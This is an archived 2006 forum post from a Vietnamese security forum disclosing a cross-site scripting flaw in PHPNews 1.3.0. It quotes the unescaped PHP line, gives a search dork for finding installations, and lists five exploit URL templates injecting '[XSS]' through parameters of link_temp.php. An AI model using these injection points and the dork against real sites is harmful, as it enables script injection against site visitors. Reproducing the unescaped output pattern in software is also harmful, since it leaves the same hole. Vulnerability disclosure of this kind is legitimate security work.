English |
Vietnamese
Rules
Main Forum
Portal
Member Listing
Statistics
Search
Reading Room
Register
Login
[
http
|
https
]
Forum Index
Thông tin new bugs và exploits
PHP News 1.3.0
[Announcement]
PHP News 1.3.0
14/12/2006 15:50:09 (+0700) |
#1
| 30448
havythoai
HVA Friend
Joined: 05/04/2004 22:59:39
Messages: 562
Offline
PHP Script: PHPNews 1.3.0
Class: XSS
Website:
http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews
-----
- Vulnerable Code:
<?php
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />
-----
- Exploits:
http://
[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://
[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://
[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://
[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://
[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
Go to:
Select a forum
-------------
Thông báo từ HVA
FAQ - Các câu hỏi thường gặp
Góp ý và Hỏi đáp thắc mắc chung
Kiểm tra bảo mật
-------------
Thảo luận bảo mật
Thảo luận thâm nhập
Thảo luận virus, trojan, spyware, worm...
Thủ thuật reverse engineering
Thông tin new bugs và exploits
Case Studies
-------------
Thảo luận hệ điều hành Windows
Thảo luận hệ điều hành *nix
Thảo luận các loại thiết bị máy tính
Thảo luận mạng và thiết bị mạng
Thông tin về các địa chỉ và tài liệu hữu ích
-------------
Người tìm việc - Việc tìm người
Thảo luận việc định hướng
Những thảo luận khác
Hình minh họa
Trash
-------------
Users currently in here
1 Anonymous
Powered by JForum - Extended by
HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 © v2012|0504|218|